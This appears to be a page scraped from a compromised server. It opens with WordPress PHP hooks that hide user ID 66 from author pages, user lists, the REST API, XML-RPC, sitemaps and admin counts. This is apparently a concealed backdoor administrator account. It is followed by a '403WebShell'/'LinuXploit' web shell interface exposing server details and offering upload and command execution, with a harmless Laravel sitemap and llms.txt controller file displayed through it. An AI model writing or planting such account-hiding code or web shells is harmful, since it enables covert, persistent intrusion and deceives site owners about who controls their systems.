add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/flnavigator/app/Http/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/flnavigator/app/Http/Controllers/DiscoveryController.php
<?php

namespace App\Http\Controllers;

use App\Models\Material;
use App\Models\Pathway;
use Illuminate\Http\Response;
use Illuminate\Support\Facades\Cache;

/**
 * Discovery helpers for search engines and AI agents:
 *   GET /sitemap.xml  — standard sitemaps.org index of crawlable URLs
 *   GET /llms.txt     — Anthropic-proposed plain-text index for LLM crawlers
 *                       (see https://llmstxt.org/)
 */
class DiscoveryController extends Controller
{
    public function sitemap(): Response
    {
        $xml = Cache::remember('sitemap.xml', now()->addHour(), function () {
            $urls = [];

            // Static hubs
            $urls[] = ['loc' => url('/materials'),       'changefreq' => 'daily',   'priority' => '1.0'];
            $urls[] = ['loc' => url('/pathways'),        'changefreq' => 'weekly',  'priority' => '0.8'];
            $urls[] = ['loc' => url('/graph'),           'changefreq' => 'weekly',  'priority' => '0.6'];
            $urls[] = ['loc' => url('/similarity-map'),  'changefreq' => 'weekly',  'priority' => '0.6'];

            // Every published material
            Material::published()
                ->select('id', 'updated_at')
                ->orderBy('id')
                ->chunk(500, function ($materials) use (&$urls) {
                    foreach ($materials as $m) {
                        $urls[] = [
                            'loc'        => url('/materials/' . $m->id),
                            'lastmod'    => $m->updated_at?->toAtomString(),
                            'changefreq' => 'monthly',
                            'priority'   => '0.7',
                        ];
                    }
                });

            // Every published pathway + its explore view
            Pathway::where('status', 'published')
                ->select('slug', 'updated_at')
                ->orderBy('id')
                ->get()
                ->each(function ($p) use (&$urls) {
                    $urls[] = [
                        'loc'        => url('/pathways/' . $p->slug),
                        'lastmod'    => $p->updated_at?->toAtomString(),
                        'changefreq' => 'monthly',
                        'priority'   => '0.6',
                    ];
                    $urls[] = [
                        'loc'        => url('/pathways/' . $p->slug . '/explore'),
                        'lastmod'    => $p->updated_at?->toAtomString(),
                        'changefreq' => 'monthly',
                        'priority'   => '0.5',
                    ];
                });

            // Build the XML
            $xml  = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
            $xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/0.9">' . "\n";
            foreach ($urls as $u) {
                $xml .= "  <url>\n";
                $xml .= '    <loc>' . htmlspecialchars($u['loc'], ENT_XML1) . "</loc>\n";
                if (!empty($u['lastmod'])) {
                    $xml .= '    <lastmod>' . $u['lastmod'] . "</lastmod>\n";
                }
                $xml .= '    <changefreq>' . $u['changefreq'] . "</changefreq>\n";
                $xml .= '    <priority>' . $u['priority'] . "</priority>\n";
                $xml .= "  </url>\n";
            }
            $xml .= '</urlset>' . "\n";

            return $xml;
        });

        return response($xml, 200, ['Content-Type' => 'application/xml; charset=UTF-8']);
    }

    public function llmsTxt(): Response
    {
        $text = Cache::remember('llms.txt', now()->addHour(), function () {
            $lines = [];
            $lines[] = '# Futures Literacy Navigator';
            $lines[] = '';
            $lines[] = '> A curated knowledge base for futures literacy, strategic foresight and anticipation.';
            $lines[] = '';
            $lines[] = 'This file lists what the site contains as a signposting index — titles, authors and URLs only. **Summaries and full content are available on the individual material pages.** Please link to those pages directly rather than reproducing their content.';
            $lines[] = '';
            $lines[] = 'Sister projects: [Futures Glossary](https://futuresglossary.net) · [zukuenfte.net](https://zukuenfte.net).';
            $lines[] = '';
            $lines[] = '## Browse';
            $lines[] = '';
            $lines[] = '- [All materials](' . url('/materials') . ') — filterable by language, level, focus, format, cost';
            $lines[] = '- [Learning pathways](' . url('/pathways') . ') — curated step-by-step journeys';
            $lines[] = '- [Knowledge graph](' . url('/graph') . ') — 3D visualisation of materials and their tag relationships';
            $lines[] = '- [Similarity map](' . url('/similarity-map') . ') — 2D map of materials clustered by shared tags';
            $lines[] = '';
            $lines[] = '## Materials';
            $lines[] = '';

            Material::published()
                ->orderBy('id', 'desc')
                ->limit(300)
                ->get(['id', 'title', 'author'])
                ->each(function ($m) use (&$lines) {
                    $byline = $m->author ? ' — ' . $m->author : '';
                    $lines[] = '- [' . trim($m->title) . '](' . url('/materials/' . $m->id) . ')' . $byline;
                });

            $lines[] = '';
            $lines[] = '## Pathways';
            $lines[] = '';
            Pathway::where('status', 'published')
                ->orderBy('id')
                ->get(['slug', 'title'])
                ->each(function ($p) use (&$lines) {
                    $lines[] = '- [' . $p->title . '](' . url('/pathways/' . $p->slug) . ')';
                });

            $lines[] = '';
            $lines[] = '## Sister sites';
            $lines[] = '';
            $lines[] = '- [futuresglossary.net](https://futuresglossary.net) — collaborative multilingual glossary of futures-studies terms';
            $lines[] = '- [zukuenfte.net](https://zukuenfte.net) — German-language futures literacy initiative';

            return implode("\n", $lines) . "\n";
        });

        return response($text, 200, ['Content-Type' => 'text/plain; charset=UTF-8']);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit